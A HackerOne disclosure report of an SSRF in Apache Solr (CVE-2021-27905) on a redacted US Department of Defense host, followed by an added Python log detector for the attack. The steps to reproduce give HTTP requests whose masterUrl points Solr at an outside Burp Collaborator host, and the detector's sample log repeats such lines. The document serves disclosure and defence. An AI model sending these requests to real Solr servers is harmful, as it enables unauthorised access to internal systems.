HackerOne report H1:1183472 (fdeleite)
History: May 04, 2021 - 5:28 a.m.

U.S. Dept Of Defense: SSRF due to CVE-2021-27905 in www.████████

2021-05-04 05:28:36 | fdeleite | hackerone.com

CVSS3: 9.8 High
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  Attack Vector: NETWORK | Attack Complexity: LOW | Privileges Required: NONE | User Interaction: NONE | Scope: UNCHANGED
  Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH

CVSS2: 7.5 High
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
  Access Vector: NETWORK | Access Complexity: LOW | Authentication: NONE
  Confidentiality Impact: PARTIAL | Integrity Impact: PARTIAL | Availability Impact: PARTIAL

EPSS: 0.973 High (Percentile: 99.8%)

Apache Solr is vulnerable to SSRF using the parameter “masterUrl”. This issue is registered as CVE-2021-27905.

Impact

A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform arbitrary command execution.

An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks that appear to originate from the organization hosting the vulnerable application, leading to potential legal liabilities and reputational damage.

Supporting Material/References

https://portswigger.net/web-security/ssrf
https://www.anquanke.com/post/id/238201

System Host(s)

www.██████████

Affected Product(s) and Version(s)

CVE Numbers

CVE-2021-27905

Steps to Reproduce

First we need to send this GET request:

GET /solr/admin/cores?wt=json HTTP/1.1
Host: www.███
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Accept-Language: en
Connection: close
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 1002
Cache-Control: max-age=2592000
Content-Type: text/plain;charset=UTF-8
Date: Tue, 04 May 2021 05:13:17 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET

████

Now we can make an HTTP request to the target we want to test it on. I'll be using Burp Collaborator; to test it yourself, replace the value accordingly.

Request

GET █████████masterUrl=http://6pwo0p85qh07drdgdlr9nr9hn8tyhn.burpcollaborator.net HTTP/1.1
Host: www.███
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Accept-Language: en
Connection: close
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 174
Cache-Control: no-cache, no-store
Content-Type: text/xml;charset=UTF-8
Date: Tue, 04 May 2021 05:13:19 GMT
Etag: "17935cb837f"
Expires: Sat, 01 Jan 2000 01:00:00 GMT
Last-Modified: Tue, 04 May 2021 05:13:20 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: ARRAffinity=450f2c90c5749e5ead79f5f3389d0369674c71e046ba20f5151e80e68da4c908;Path=/;Domain=www.██████
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET

<?xml version="1.0" encoding="UTF-8"?>
<response>
<lst name="responseHeader"><int name="status">0</int><int name="QTime">0</int></lst><str name="status">OK</str>
</response>

And in Burp's Collaborator we receive an HTTP request from the server:
█████
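An added detection example, not part of this report or of Solr itself: it scans web-server access-log lines for replication requests whose masterUrl (or the newer leaderUrl name) points at a host outside an allow-list of known replication leaders, which is what the exchange above would look like in a log. The /replication handler path, the combined log format and the allow-list hosts are assumptions, and the sample log lines are constructed.

```python
"""Added detection example (not from the original report): flag Solr replication
requests whose masterUrl (or leaderUrl, its newer name) points at a host outside
the known replication leaders. Log format, handler path and allow-list are assumed."""
import re
from urllib.parse import parse_qs, urlsplit

# Assumed: the only hosts this Solr node should ever pull an index from.
ALLOWED_LEADER_HOSTS = {"solr-leader-1.internal", "solr-leader-2.internal"}

# Common/combined access-log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def fetch_target_host(path):
    """Host named by masterUrl/leaderUrl on a /replication request, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/replication"):
        return None
    params = parse_qs(parts.query)  # percent-decodes the values for us
    for key in ("masterUrl", "leaderUrl"):
        if key in params:
            return urlsplit(params[key][0]).hostname
    return None


def suspicious_replication_requests(lines, allowed=ALLOWED_LEADER_HOSTS):
    """One finding per request that would make Solr fetch from a non-allowed host."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host = fetch_target_host(m["path"])
        if host is None or host in allowed:
            continue
        findings.append({"client": m["client"], "target": host, "status": int(m["status"])})
    return findings


# Constructed sample log: a core listing, an out-of-band probe like the report's,
# a legitimate pull from an allowed leader, and a pull aimed at an unknown host.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/May/2021:05:13:17 +0000] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 1002',
    '10.0.0.5 - - [04/May/2021:05:13:19 +0000] "GET /solr/core1/replication?command=fetchindex'
    '&masterUrl=http://xyz.burpcollaborator.net/ HTTP/1.1" 200 174',
    '10.0.0.9 - - [04/May/2021:05:14:02 +0000] "GET /solr/core1/replication?command=fetchindex'
    '&masterUrl=http%3A%2F%2Fsolr-leader-1.internal%3A8983%2Fsolr%2Fcore1 HTTP/1.1" 200 174',
    '198.51.100.7 - - [04/May/2021:05:15:40 +0000] "GET /solr/core1/replication?command=fetchindex'
    '&leaderUrl=http://203.0.113.10:8080/ HTTP/1.1" 200 174',
]
```

Running `suspicious_replication_requests(SAMPLE_LOG)` returns the two out-of-allow-list pulls (the Collaborator probe and the unknown host) and ignores the core listing and the legitimate leader fetch.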

Suggested Mitigation/Remediation Actions
